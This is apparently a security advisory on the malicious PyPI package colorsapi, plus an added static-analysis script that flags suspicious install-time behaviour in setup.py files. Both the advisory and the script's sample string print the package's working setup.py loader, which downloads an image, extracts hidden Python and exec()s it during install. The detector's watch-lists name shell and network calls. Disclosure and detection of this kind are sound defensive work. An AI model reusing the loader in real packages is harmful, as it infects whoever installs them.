Malicious Package Affecting colorsapi package, versions [0,]
- Snyk ID SNYK-PYTHON-COLORSAPI-3112353
- published 11 Nov 2022
- disclosed 11 Nov 2022
- credit Raul Onitza-Klugman, Snyk
Introduced: 11 Nov 2022
- severity: Malicious
- CVE: not available
- CWE: CWE-506 (Embedded Malicious Code)
How to fix?
Avoid using all malicious instances of the colorsapi package. The payload lives in setup.py, so it runs at `pip install` time, before anything imports the package; remove colorsapi from every environment where it is present and treat any Windows host that installed it as compromised.
Overview
colorsapi is a malicious package. It is a "dependency confusion" package: its name is modelled on existing repositories, namespaces or components so that users install it in place of what they meant to install, and the package they get carries malicious code.
The malicious package drops Discord-targeting malware onto Windows machines and persists by writing itself into the registry. The attack starts by downloading a .png file, extracting a Python script hidden in the image with LSB steganography (the judyb library's lsb.reveal), and executing it. The code is heavily obfuscated and the attack is multi-staged.
Malicious Code
The initial stage of the attack is in the package's setup.py file, so it executes during installation (comments added; the code is otherwise as published):

```python
import os
from setuptools import setup, find_packages

# Stage 0: make sure the HTTP client and the judyb steganography library are
# importable, installing them with pip if the import fails.
try:
    import requests
    from judyb import lsb
except:
    os.system('pip install requests')
    os.system('pip install judyb')
    import requests
    from judyb import lsb

# Stage 1: fetch the carrier image, drop it under %TEMP% (or under %APPDATA%
# if the %TEMP% copy already exists), extract the LSB-hidden Python source
# with lsb.reveal() and exec() it.  Every error is swallowed so a failed
# attempt still looks like a clean install.  Note that `\a` inside these
# non-raw string literals is the BEL escape, not a backslash followed by "a".
try:
    if os.path.exists(f'{os.getenv("TEMP")}\aRl53RS.png') != True:
        r = requests.get('https://i.imgur.com/aRl53RS.png')
        with open(f'{os.getenv("TEMP")}\aRl53RS.png', 'wb') as f:
            f.write(r.content)
        exec(lsb.reveal(f'{os.getenv("TEMP")}\aRl53RS.png'))
    else:
        r = requests.get('https://i.imgur.com/aRl53RS.png')
        with open(f'{os.getenv("APPDATA")}\aRl53RS.png', 'wb') as f:
            f.write(r.content)
        exec(lsb.reveal(f'{os.getenv("APPDATA")}\aRl53RS.png'))
except:
    pass
```
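Everything that makes that setup.py dangerous is visible statically: it shells out to pip, fetches a URL, builds paths from %TEMP% and %APPDATA%, exec()s data pulled out of a downloaded file, and wraps the whole thing in a bare except that swallows errors. The script below is an added example, not Snyk's tooling and not code from the colorsapi package: an AST-based triage pass that flags those install-time behaviours in a setup.py. The rule names, the call and import lists, and the benign sample are assumptions chosen for illustration; the malicious sample is the setup.py quoted above.

```python
"""Static triage of a setup.py for install-time behaviour that a build script has
no legitimate reason to perform.  Added example; the rule set is illustrative."""
import ast
from dataclasses import dataclass

# Module-qualified calls that mean "shell out" or "talk to the network" during
# `pip install`.  Assumption: these lists are a starting point, not exhaustive.
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_output"}
NETWORK_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen",
                 "urllib.request.urlretrieve"}
# Imports a build script never needs: an HTTP client, and the LSB steganography
# library (judyb) the advisory's payload is hidden with.
SUSPICIOUS_IMPORTS = {"requests": "HTTP client", "judyb": "LSB steganography library"}
# Environment variables the advisory's payload uses to pick a drop directory.
PROFILE_ENV = {"TEMP", "TMP", "APPDATA", "LOCALAPPDATA", "USERPROFILE"}


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain such as os.system, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _str_arg(call):
    """First positional argument of a call if it is a string literal, else None."""
    if call.args and isinstance(call.args[0], ast.Constant) and isinstance(call.args[0].value, str):
        return call.args[0].value
    return None


def triage_setup_py(source):
    """Parse setup.py source and return findings sorted by line (empty = nothing tripped)."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            arg = _str_arg(node)
            if name in ("exec", "eval"):
                found.append(Finding(node.lineno, "dynamic-exec", f"{name}() of code built at run time"))
            elif name in SHELL_CALLS:
                found.append(Finding(node.lineno, "shell-command", f"{name}({arg!r})"))
                if arg and "pip install" in arg:
                    found.append(Finding(node.lineno, "pip-install-in-setup",
                                         "pulls packages outside the declared install_requires"))
            elif name in NETWORK_CALLS:
                found.append(Finding(node.lineno, "network-fetch", f"{name} -> {arg}"))
            elif name == "os.getenv" and arg in PROFILE_ENV:
                found.append(Finding(node.lineno, "user-profile-path", f"path built from %{arg}%"))
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            mods = [node.module] if isinstance(node, ast.ImportFrom) else [a.name for a in node.names]
            for mod in mods:
                top = (mod or "").split(".")[0]
                if top in SUSPICIOUS_IMPORTS:
                    found.append(Finding(node.lineno, "suspicious-import", f"{top}: {SUSPICIOUS_IMPORTS[top]}"))
        elif isinstance(node, ast.ExceptHandler) and node.type is None:
            # `except: pass` hides every failure from the person running pip.
            if len(node.body) == 1 and isinstance(node.body[0], ast.Pass):
                found.append(Finding(node.lineno, "bare-except-pass", "all errors silently swallowed"))
    return sorted(found, key=lambda f: (f.line, f.rule))


# The setup.py from the advisory above, as a raw string so `\a` stays literal.
SAMPLE_SETUP_PY = r'''
import os
from setuptools import setup, find_packages
try:
    import requests
    from judyb import lsb
except:
    os.system('pip install requests')
    os.system('pip install judyb')
    import requests
    from judyb import lsb
try:
    if os.path.exists(f'{os.getenv("TEMP")}\aRl53RS.png') != True:
        r = requests.get('https://i.imgur.com/aRl53RS.png')
        with open(f'{os.getenv("TEMP")}\aRl53RS.png', 'wb') as f:
            f.write(r.content)
        exec(lsb.reveal(f'{os.getenv("TEMP")}\aRl53RS.png'))
    else:
        r = requests.get('https://i.imgur.com/aRl53RS.png')
        with open(f'{os.getenv("APPDATA")}\aRl53RS.png', 'wb') as f:
            f.write(r.content)
        exec(lsb.reveal(f'{os.getenv("APPDATA")}\aRl53RS.png'))
except:
    pass
'''

# Constructed benign setup.py for comparison (assumption: a typical minimal one).
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages
setup(name="demo", version="0.1", packages=find_packages())
'''

if __name__ == "__main__":
    for f in triage_setup_py(SAMPLE_SETUP_PY):
        print(f"line {f.line:>3}  {f.rule:<22} {f.detail}")
    print("benign findings:", triage_setup_py(BENIGN_SETUP_PY))
```

Run it over the setup.py extracted from an sdist archive before installing the package. A bare `except: pass` on its own is noise in some real projects, but `exec()` of anything, or a pip call, inside a setup.py is worth blocking the install and reading the file by hand.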